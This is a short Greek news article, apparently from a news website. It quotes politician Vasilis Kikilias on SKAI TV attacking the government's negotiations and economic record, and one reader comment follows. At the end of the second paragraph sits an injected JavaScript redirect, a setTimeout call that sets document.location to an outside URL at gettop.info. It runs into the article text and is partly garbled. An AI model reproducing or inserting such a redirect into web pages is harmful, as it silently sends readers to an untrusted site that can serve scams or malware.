Κικίλιας: Κάθε φορά που η κυβέρνηση διαπραγματεύεται, οι πολίτες τρέμουν

1
12

 

«Κάθε φορά που η κυβέρνηση έχει διαπραγματευτεί, οι πολίτες τρέμουν. Είναι θέμα ανεπάρκειας, εμπιστοσύνης, ικανότητας και διοίκησης. Αξίζουν αυτή η χώρα και οι συμπολίτες μου πολύ καλύτερα. Η ΝΔ δίνει μια πολύ μεγάλη μάχη. Σε αυτήν έλαχε και στον Κυριάκο Μητσοτάκη, να μπορέσουν να συσπειρώσουν το μέγιστο δυνατό αριθμό των συμπολιτών μας έτσι ώστε να μπορέσει να υπάρξει πολιτική αλλαγή» είπε ο Βασίλης Κικίλιας μιλώντας στον ΣΚΑΪ, προβλέποντας νίκη του κόμματός του.

«Μετά τις εκλογές, ανεξάρτητα από το αποτέλεσμα, προφανώς στο πλαίσιο τού να πάει η χώρα παρακάτω, θα επιδιώξουμε να έχουμε τη μέγιστη δυνατή κοινωνική συμμαχία» τόνισε ο κ. Κικίλιας σημειώνοντας ότι τον Οκτώβριο είχαμε 85.000 απολύσεις, ότι οι συνταξιούχοι που είχαν πιστέψει σε αυτήν την κυβέρνηση είδαν περικοπές στις συντάξεις και στο ΕΚΑΣ και πως οι μικρομεσαίοι καταστρέφονται από την υπερφορολόγηση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

1 ΣΧΟΛΙΟ

  1. Ενώ όταν διαπραγματευόταν η κυβέρνηση Σαμαρά κοιμόμασταν ήσυχοι!!!! ας γελάσω, χαχαχαχαχα!!!! Μάγκες φέρτε πίσω τα κλεμένα και πηγαίνεται σπίτια σας και αφήστε του νέους και αφθαρτους, σε όλα τα κόμματα, να πάνε την Ελλάδα μπροστά.

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here